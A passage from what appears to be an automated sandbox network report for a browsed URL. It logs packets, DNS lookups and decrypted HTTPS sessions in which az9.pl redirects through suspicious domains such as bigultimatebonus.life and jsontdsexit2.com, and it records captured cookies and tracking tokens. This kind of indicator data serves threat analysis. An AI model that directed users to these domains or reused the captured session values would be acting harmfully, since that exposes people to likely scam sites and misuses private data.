                              Feb 22, 2024 08:09:42.385509968 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.386689901 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.387165070 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:42.387265921 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.387342930 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:42.429980993 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.839370012 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.839431047 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.839520931 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:42.839581966 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.839658022 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:42.839673996 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.839716911 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:42.839776993 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:42.844312906 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:44.524432898 CET49791443192.168.2.4185.155.186.25
                              Feb 22, 2024 08:09:44.524496078 CET44349791185.155.186.25192.168.2.4
                              Feb 22, 2024 08:09:46.616322041 CET44349742142.250.80.100192.168.2.4
                              Feb 22, 2024 08:09:46.616406918 CET44349742142.250.80.100192.168.2.4
                              Feb 22, 2024 08:09:46.616471052 CET49742443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:09:47.875752926 CET49742443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:09:47.875778913 CET44349742142.250.80.100192.168.2.4
                              Feb 22, 2024 08:09:56.130078077 CET804972369.164.46.128192.168.2.4
                              Feb 22, 2024 08:09:56.130332947 CET4972380192.168.2.469.164.46.128
                              Feb 22, 2024 08:09:56.130420923 CET4972380192.168.2.469.164.46.128
                              Feb 22, 2024 08:09:56.221302032 CET804972369.164.46.128192.168.2.4
                              Feb 22, 2024 08:10:10.445543051 CET804972469.164.46.128192.168.2.4
                              Feb 22, 2024 08:10:10.445671082 CET4972480192.168.2.469.164.46.128
                              Feb 22, 2024 08:10:10.445811987 CET4972480192.168.2.469.164.46.128
                              Feb 22, 2024 08:10:10.533171892 CET804972469.164.46.128192.168.2.4
                              Feb 22, 2024 08:10:36.343457937 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:36.343504906 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.343708038 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:36.344057083 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:36.344099045 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.537472963 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.537900925 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:36.537930012 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.538405895 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.538912058 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:36.539014101 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:36.592211008 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:46.561913967 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:46.562091112 CET44349804142.250.80.100192.168.2.4
                              Feb 22, 2024 08:10:46.562258959 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:47.864702940 CET49804443192.168.2.4142.250.80.100
                              Feb 22, 2024 08:10:47.864769936 CET44349804142.250.80.100192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Feb 22, 2024 08:09:31.671041012 CET5042653192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:31.671132088 CET6257453192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:31.673904896 CET5645653192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:31.674256086 CET4957153192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:31.759031057 CET53543101.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:31.759092093 CET53504261.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:31.759650946 CET53625741.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:31.762168884 CET53564561.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:31.762795925 CET53495711.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:32.362829924 CET53534921.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:32.768421888 CET5984953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:32.768817902 CET5576953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:32.873526096 CET53598491.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:32.878825903 CET53557691.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:32.881241083 CET5680853192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:32.881350040 CET5320153192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:32.972400904 CET53568081.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:32.984448910 CET53532011.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:33.609556913 CET4936653192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:33.609776974 CET6003253192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:33.699465990 CET53493661.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:33.699892044 CET53600321.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:35.462512016 CET5403953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:35.462891102 CET5969253192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:35.550544024 CET53540391.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:35.551245928 CET53596921.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:36.284419060 CET6221353192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:36.284816027 CET5302553192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:36.372296095 CET53622131.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:36.373162985 CET53530251.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:36.723768950 CET5632753192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:36.724338055 CET6267953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:36.811517000 CET53543841.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:36.811881065 CET53563271.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:36.812031031 CET53626791.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:38.614403009 CET5923453192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:38.614758015 CET6542953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:38.703298092 CET53654291.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:38.703366041 CET53592341.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:39.491147995 CET6363153192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:39.491681099 CET5651353192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:39.580344915 CET53636311.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:39.580770969 CET53565131.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:39.991873026 CET5920053192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:39.992063046 CET6144953192.168.2.41.1.1.1
                              Feb 22, 2024 08:09:40.080462933 CET53592001.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:40.080522060 CET53614491.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:40.456803083 CET53609561.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:49.510938883 CET53527741.1.1.1192.168.2.4
                              Feb 22, 2024 08:09:57.334954977 CET138138192.168.2.4192.168.2.255
                              Feb 22, 2024 08:10:08.305330038 CET53522031.1.1.1192.168.2.4
                              Feb 22, 2024 08:10:31.222436905 CET53605371.1.1.1192.168.2.4
                              Feb 22, 2024 08:10:31.385243893 CET53493311.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Feb 22, 2024 08:09:31.671041012 CET192.168.2.41.1.1.10xd00dStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:31.671132088 CET192.168.2.41.1.1.10x9b8Standard query (0)clients2.google.com65IN (0x0001)false
                              Feb 22, 2024 08:09:31.673904896 CET192.168.2.41.1.1.10x788eStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:31.674256086 CET192.168.2.41.1.1.10x9497Standard query (0)accounts.google.com65IN (0x0001)false
                              Feb 22, 2024 08:09:32.768421888 CET192.168.2.41.1.1.10xf512Standard query (0)az9.plA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.768817902 CET192.168.2.41.1.1.10x6ed2Standard query (0)az9.pl65IN (0x0001)false
                              Feb 22, 2024 08:09:32.881241083 CET192.168.2.41.1.1.10xfb98Standard query (0)az9.plA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.881350040 CET192.168.2.41.1.1.10xca5eStandard query (0)az9.pl65IN (0x0001)false
                              Feb 22, 2024 08:09:33.609556913 CET192.168.2.41.1.1.10x11fcStandard query (0)bigultimatebonus.lifeA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:33.609776974 CET192.168.2.41.1.1.10xeb0Standard query (0)bigultimatebonus.life65IN (0x0001)false
                              Feb 22, 2024 08:09:35.462512016 CET192.168.2.41.1.1.10x1dc9Standard query (0)y1uy13f.xuowltwo.liveA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:35.462891102 CET192.168.2.41.1.1.10xfd87Standard query (0)y1uy13f.xuowltwo.live65IN (0x0001)false
                              Feb 22, 2024 08:09:36.284419060 CET192.168.2.41.1.1.10xe093Standard query (0)www.google.comA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.284816027 CET192.168.2.41.1.1.10x9a1fStandard query (0)www.google.com65IN (0x0001)false
                              Feb 22, 2024 08:09:36.723768950 CET192.168.2.41.1.1.10x5197Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.724338055 CET192.168.2.41.1.1.10xf61Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                              Feb 22, 2024 08:09:38.614403009 CET192.168.2.41.1.1.10x5b4Standard query (0)jsontdsexit2.comA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:38.614758015 CET192.168.2.41.1.1.10x84bfStandard query (0)jsontdsexit2.com65IN (0x0001)false
                              Feb 22, 2024 08:09:39.491147995 CET192.168.2.41.1.1.10xa5f2Standard query (0)y1uy13f.xuowltwo.liveA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:39.491681099 CET192.168.2.41.1.1.10xe2d1Standard query (0)y1uy13f.xuowltwo.live65IN (0x0001)false
                              Feb 22, 2024 08:09:39.991873026 CET192.168.2.41.1.1.10xcc4fStandard query (0)jsontdsexit2.comA (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:39.992063046 CET192.168.2.41.1.1.10x7ac6Standard query (0)jsontdsexit2.com65IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Feb 22, 2024 08:09:31.759092093 CET1.1.1.1192.168.2.40xd00dNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:09:31.759092093 CET1.1.1.1192.168.2.40xd00dNo error (0)clients.l.google.com142.250.64.110A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:31.759650946 CET1.1.1.1192.168.2.40x9b8No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:09:31.762168884 CET1.1.1.1192.168.2.40x788eNo error (0)accounts.google.com142.251.16.84A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.873526096 CET1.1.1.1192.168.2.40xf512No error (0)az9.pl172.67.135.33A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.873526096 CET1.1.1.1192.168.2.40xf512No error (0)az9.pl104.21.26.13A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.878825903 CET1.1.1.1192.168.2.40x6ed2No error (0)az9.pl65IN (0x0001)false
                              Feb 22, 2024 08:09:32.972400904 CET1.1.1.1192.168.2.40xfb98No error (0)az9.pl104.21.26.13A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.972400904 CET1.1.1.1192.168.2.40xfb98No error (0)az9.pl172.67.135.33A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:32.984448910 CET1.1.1.1192.168.2.40xca5eNo error (0)az9.pl65IN (0x0001)false
                              Feb 22, 2024 08:09:33.699465990 CET1.1.1.1192.168.2.40x11fcNo error (0)bigultimatebonus.life185.155.184.32A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:35.550544024 CET1.1.1.1192.168.2.40x1dc9No error (0)y1uy13f.xuowltwo.live185.155.184.55A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:35.550544024 CET1.1.1.1192.168.2.40x1dc9No error (0)y1uy13f.xuowltwo.live185.155.186.25A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.372296095 CET1.1.1.1192.168.2.40xe093No error (0)www.google.com142.250.80.100A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.373162985 CET1.1.1.1192.168.2.40x9a1fNo error (0)www.google.com65IN (0x0001)false
                              Feb 22, 2024 08:09:36.811881065 CET1.1.1.1192.168.2.40x5197No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:09:36.811881065 CET1.1.1.1192.168.2.40x5197No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.811881065 CET1.1.1.1192.168.2.40x5197No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.811881065 CET1.1.1.1192.168.2.40x5197No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.811881065 CET1.1.1.1192.168.2.40x5197No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:36.812031031 CET1.1.1.1192.168.2.40xf61No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:09:38.703366041 CET1.1.1.1192.168.2.40x5b4No error (0)jsontdsexit2.com136.243.216.235A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:39.580344915 CET1.1.1.1192.168.2.40xa5f2No error (0)y1uy13f.xuowltwo.live185.155.186.25A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:39.580344915 CET1.1.1.1192.168.2.40xa5f2No error (0)y1uy13f.xuowltwo.live185.155.184.55A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:40.080462933 CET1.1.1.1192.168.2.40xcc4fNo error (0)jsontdsexit2.com136.243.216.235A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:09:48.914941072 CET1.1.1.1192.168.2.40x7702No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:09:48.914941072 CET1.1.1.1192.168.2.40x7702No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:10:01.732667923 CET1.1.1.1192.168.2.40x439aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:10:01.732667923 CET1.1.1.1192.168.2.40x439aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                              Feb 22, 2024 08:10:23.400482893 CET1.1.1.1192.168.2.40xe1bcNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Feb 22, 2024 08:10:23.400482893 CET1.1.1.1192.168.2.40xe1bcNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • clients2.google.com
                              • accounts.google.com
                              • az9.pl
                              • bigultimatebonus.life
                              • https:
                                • y1uy13f.xuowltwo.live
                                • cdn.jsdelivr.net
                                • jsontdsexit2.com
                              • fs.microsoft.com

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730142.250.64.1104433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:31 UTC752OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                              Host: clients2.google.com
                              Connection: keep-alive
                              X-Goog-Update-Interactivity: fg
                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                              X-Goog-Update-Updater: chromecrx-117.0.5938.132
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:32 UTC732INHTTP/1.1 200 OK
                              Content-Security-Policy: script-src 'report-sample' 'nonce-C7t21wG88ppKaJ5g3HhM7A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Thu, 22 Feb 2024 07:09:32 GMT
                              Content-Type: text/xml; charset=UTF-8
                              X-Daynum: 6260
                              X-Daystart: 83372
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-22 07:09:32 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 36 30 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 38 33 33 37 32 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                              Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6260" elapsed_seconds="83372"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                              2024-02-22 07:09:32 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                              Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                              2024-02-22 07:09:32 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.449731142.251.16.844433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:31 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                              Host: accounts.google.com
                              Connection: keep-alive
                              Content-Length: 1
                              Origin: https://www.google.com
                              Content-Type: application/x-www-form-urlencoded
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                              2024-02-22 07:09:31 UTC1OUTData Raw: 20
                              Data Ascii:
                              2024-02-22 07:09:32 UTC1798INHTTP/1.1 200 OK
                              Content-Type: application/json; charset=utf-8
                              Access-Control-Allow-Origin: https://www.google.com
                              Access-Control-Allow-Credentials: true
                              X-Content-Type-Options: nosniff
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Thu, 22 Feb 2024 07:09:32 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Content-Security-Policy: script-src 'report-sample' 'nonce-5gv_VJozfwvbKf7p8_yTdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQJiIW6ONc9ur2MTuHDtpCMAoVgXrw"
                              Server: ESF
                              X-XSS-Protection: 0
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-22 07:09:32 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                              Data Ascii: 11["gaia.l.a.r",[]]
                              2024-02-22 07:09:32 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.449734104.21.26.134433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:33 UTC649OUTGET / HTTP/1.1
                              Host: az9.pl
                              Connection: keep-alive
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:33 UTC1335INHTTP/1.1 302 Found
                              Date: Thu, 22 Feb 2024 07:09:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=18eosq2qff264p3j1m4ldkamje; path=/
                              Set-Cookie: _subid=23n0u3t1tkru; expires=Fri, 23 Feb 2024 07:09:33 GMT; Max-Age=86400; path=/; domain=.az9.pl
                              Set-Cookie: f748d=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjVcIjoxNzA4NTg1NzczfSxcImNhbXBhaWduc1wiOntcIjFcIjoxNzA4NTg1NzczfSxcInRpbWVcIjoxNzA4NTg1NzczfSJ9.rZvVeWChYyTrW4vDEJ-k39f7EGpbIYA39tNdSCl9ouE; expires=Fri, 23 Feb 2024 07:09:33 GMT; Max-Age=86400; path=/; domain=.az9.pl
                              Set-Cookie: _token=uuid_23n0u3t1tkru_23n0u3t1tkru65d6f32d7b01d9.81063748; expires=Fri, 23 Feb 2024 07:09:33 GMT; Max-Age=86400; path=/; domain=.az9.pl
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              Location: https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              X-Content-Type-Options: nosniff
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iW2UiG1BtuI91xEeCviDIPvJ2Z5JzTHdnIEaf306XuGnSiSrmCa59Bo%2F1su84re0tHM7eWPYQEJLqJ%2FOwYYs72XBzNqxfNyjuIGnILDPztlB4AWauWdyETE%3D"}],"group":"cf-nel","max_age":604800}
                              2024-02-22 07:09:33 UTC149INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 35 39 35 36 37 37 62 35 61 38 37 37 32 38 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                              Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8595677b5a877286-EWRalt-svc: h3=":443"; ma=86400
                              2024-02-22 07:09:33 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.449735185.155.184.324433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
